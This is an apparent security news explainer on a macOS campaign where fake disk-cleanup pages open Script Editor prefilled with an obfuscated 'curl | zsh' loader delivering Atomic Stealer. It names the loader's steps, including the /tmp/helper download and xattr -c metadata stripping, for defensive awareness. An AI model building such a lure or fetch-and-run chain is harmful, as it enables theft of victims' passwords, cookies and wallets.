macOS script exploit spreads Atomic Stealer

A Mac can run little automation scripts the way a kitchen can run timers and appliances, and Apple ships a built-in app called Script Editor for that job. In this campaign, attackers stop asking people to paste commands into Terminal and instead push them into Script Editor, which feels more official because it is already on every Mac. (jamf.com) The trick starts on fake Apple-themed pages that claim they can help “reclaim disk space on your Mac.” When a victim clicks an “Execute” button, the page uses the `applescript://` link format to ask the browser to open Script Editor with code already filled in. (jamf.com) That changes one small but important step in the scam. Instead of making the victim copy a command into Terminal by hand, the attackers move the victim from a webpage into a pre-populated script window that is ready to run. (jamf.com) Apple had already added a speed bump in macOS Tahoe 26.4 for the older version of this scam by warning when pasted Terminal commands are about to run. Jamf says this newer chain gets around that specific friction point because Script Editor becomes the launch pad instead of Terminal. (jamf.com, support.apple.com) Behind the window dressing, the script runs an obfuscated `curl | zsh` command, which is the Unix equivalent of telling your computer to fetch instructions from the internet and execute them immediately. BleepingComputer reports that the stages include a base64-and-gzip decoded payload, a download into `/tmp/helper`, and an `xattr -c` command to strip security metadata before execution. (bleepingcomputer.com) The final payload is Atomic macOS Stealer, usually shortened to Atomic Stealer or AMOS, a commercial information-stealing malware family first documented in April 2023. SentinelOne reported that its operators advertised access through Telegram for about $1,000 per month, which helps explain why the same malware keeps showing up behind different lures. (sentinelone.com, thehackernews.com) What it steals is the digital equivalent of a thief emptying every unlocked drawer in one pass. Jamf and Moonlock say Atomic Stealer goes after Keychain data, browser passwords, cookies, autofill data, stored credit cards, desktop files, and cryptocurrency wallet data from both browser extensions and desktop wallet apps. (jamf.com, moonlock.com) Apple’s built-in defenses still exist, and Apple says macOS relies on Gatekeeper, notarization, and XProtect to block or remove known malware. The problem in attacks like this is not that those layers vanished, but that the first move comes from a user approving a trusted built-in app to open and run something that looks like routine maintenance. (support.apple.com, jamf.com) The safest rule is simple and boring: if a website tells you to fix your Mac by clicking “Execute,” opening Script Editor, or running code you did not write, close the tab. Jamf’s advice for this campaign is to treat Script Editor prompts as high risk and use Apple’s own support material, not random cleanup guides, when your Mac says it is low on space. (jamf.com, support.apple.com)